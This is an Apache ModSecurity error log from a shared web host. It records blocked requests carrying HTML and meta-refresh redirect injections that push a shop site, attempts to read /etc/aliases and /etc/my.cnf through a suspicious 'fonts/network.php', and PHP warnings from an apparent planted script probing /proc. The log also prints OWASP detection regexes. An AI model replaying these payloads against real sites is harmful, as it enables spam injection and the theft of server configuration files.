[Mon May 11 19:42:03.581473 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.582472 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.586243 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.586361 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.586541 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.586983 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:03.587258 2026] [security2:error] [pid 1501883:tid 1501896] [client 27.78.84.116:49527] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6zP5Q_-MBliRCAxOaAAAAAs"]
[Mon May 11 19:42:04.285591 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.292622 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.292818 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.292926 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.293103 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.293542 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:04.293810 2026] [security2:error] [pid 1501883:tid 1501897] [client 27.78.84.116:49623] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU7DP5Q_-MBliRCAxOaQAAAAw"]
[Mon May 11 19:42:17.779920 2026] [security2:error] [pid 1511173:tid 1511187] [client 43.163.206.70:54046] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/le-pmr/les-adherents/"] [unique_id "agIU-fjVc-A-CSptvm1aSQAAAEs"]
[Mon May 11 19:42:42.137766 2026] [authz_core:error] [pid 1501883:tid 1501896] [client 216.73.216.110:53461] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/cas/error_log
[Mon May 11 19:42:54.273353 2026] [security2:error] [pid 1502013:tid 1502041] [client 43.130.72.40:48482] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-vous-attend-a-la-brasserie/"] [unique_id "agIVHpYn-x0CHsbEbP2TcAAAAI4"]
PHP Warning:  filesize(): stat failed for /proc/26/task/26/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/26/task/26/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/26/task/26/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/26/task/26/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/26/task/26/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/26/task/26/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:44:43.523517 2026] [ssl:error] [pid 1511173:tid 1511195] (EAI 2)Name or service not known: [client 54.171.163.120:46030] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:44:43.523670 2026] [ssl:error] [pid 1511173:tid 1511195] AH01941: stapling_renew_response: responder error
[Mon May 11 19:45:05.397834 2026] [security2:error] [pid 1502013:tid 1502066] [client 216.73.216.110:53333] ModSecurity: Warning. Matched phrase "etc/alias" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/alias found within ARGS:filesrc: /etc/aliases.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIVoZYn-x0CHsbEbP2UmAAAAIM"]
[Mon May 11 19:45:05.398907 2026] [security2:error] [pid 1502013:tid 1502066] [client 216.73.216.110:53333] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIVoZYn-x0CHsbEbP2UmAAAAIM"]
[Mon May 11 19:45:05.488945 2026] [security2:error] [pid 1502013:tid 1502066] [client 216.73.216.110:53333] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIVoZYn-x0CHsbEbP2UmAAAAIM"]
[Mon May 11 19:45:39.699223 2026] [security2:error] [pid 1516058:tid 1516094] [client 14.236.201.211:53222] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: 09ee29382d0c09bdf366fbd825eb16a5||1778523338||1778522978"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2023/12/Rent-Paradise-Lodge-Caraibe-exterieur.jpg"] [unique_id "agIVwyMeXtzav-mi9SyY3wAAAMQ"]
[Mon May 11 19:45:39.699453 2026] [security2:error] [pid 1516058:tid 1516094] [client 14.236.201.211:53222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2023/12/Rent-Paradise-Lodge-Caraibe-exterieur.jpg"] [unique_id "agIVwyMeXtzav-mi9SyY3wAAAMQ"]
[Mon May 11 19:45:40.571277 2026] [security2:error] [pid 1516058:tid 1516094] [client 14.236.201.211:53222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIVwyMeXtzav-mi9SyY3wAAAMQ"]
[Mon May 11 19:46:11.738330 2026] [security2:error] [pid 1501883:tid 1501893] [client 43.156.71.177:44120] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/dune-etincelle/"] [unique_id "agIV4zP5Q_-MBliRCAxPtQAAAAg"]
[Mon May 11 19:46:22.118078 2026] [security2:error] [pid 1502013:tid 1502035] [client 89.124.69.73:41510] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f0e9fe8de7338b08719902db755958eb||1778523368||1778523008"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIV7pYn-x0CHsbEbP2U-AAAAIY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:46:22.118401 2026] [security2:error] [pid 1502013:tid 1502035] [client 89.124.69.73:41510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIV7pYn-x0CHsbEbP2U-AAAAIY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:46:22.119775 2026] [security2:error] [pid 1502013:tid 1502035] [client 89.124.69.73:41510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIV7pYn-x0CHsbEbP2U-AAAAIY"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:46:29.431689 2026] [security2:error] [pid 1501831:tid 1501838] [client 216.73.216.110:35302] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:filesrc: /etc/my.cnf.elevate_post_distro_upgrade_orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] 